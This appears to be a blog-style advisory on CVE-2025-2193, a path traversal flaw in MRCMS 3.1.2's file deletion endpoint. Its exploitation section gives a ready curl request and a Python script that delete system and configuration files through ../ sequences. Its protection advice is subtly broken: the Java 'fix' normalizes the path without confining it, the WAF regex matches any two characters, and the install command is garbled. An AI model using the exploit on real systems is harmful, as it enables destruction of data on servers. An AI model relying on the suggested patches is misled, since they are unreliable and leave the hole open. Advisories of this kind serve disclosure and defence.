How CVE-2025-2193 Works
This critical path traversal vulnerability in MRCMS 3.1.2 stems from improper input validation in the `delete` function of /admin/file/delete.do
. The `FileController` component fails to sanitize the `path/name` parameter, allowing attackers to manipulate directory paths remotely. By injecting sequences like ../
, an attacker can escape the intended directory and delete arbitrary files. The lack of authentication checks enables unprivileged users to exploit this flaw, potentially leading to system compromise via deletion of critical files.
DailyCVE Form
Platform: MRCMS
Version: 3.1.2
Vulnerability: Path Traversal
Severity: Critical
Date: 04/09/2025
What Undercode Say:
Exploitation
1. Craft malicious HTTP request:
curl -X POST 'http://target.com/admin/file/delete.do' -d 'path=../../../../etc/passwd'
2. Automated exploit script (Python):
import requests url = "http://target.com/admin/file/delete.do" payload = {"path": "../../../../var/www/html/config.php"} requests.post(url, data=payload)
Protection
- Patch: Apply vendor update or modify `FileController` to sanitize inputs:
String safePath = Paths.get(baseDir).resolve(request.getParameter("path")).normalize().toString();
2. WAF rule to block `../` sequences:
location ~ .do$ { if ($args ~ "..") { return 403; } }
3. File permission hardening:
chmod -R 750 /var/www/html/admin/
Detection
1. Log monitoring for suspicious deletions:
grep "delete.do" /var/log/tomcat/access.log | grep ".."
2. Integrity checking:
sudo apt install aide aide --init && aide --check
Analytics
- Attack Surface: Remote, unauthenticated
- Impact Score: 9.1 (CVSS 4.0)
- Exploitability: Weaponized PoC available
- Mitigation Complexity: Low (input validation)
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2193
Extra Source Hub:
Undercode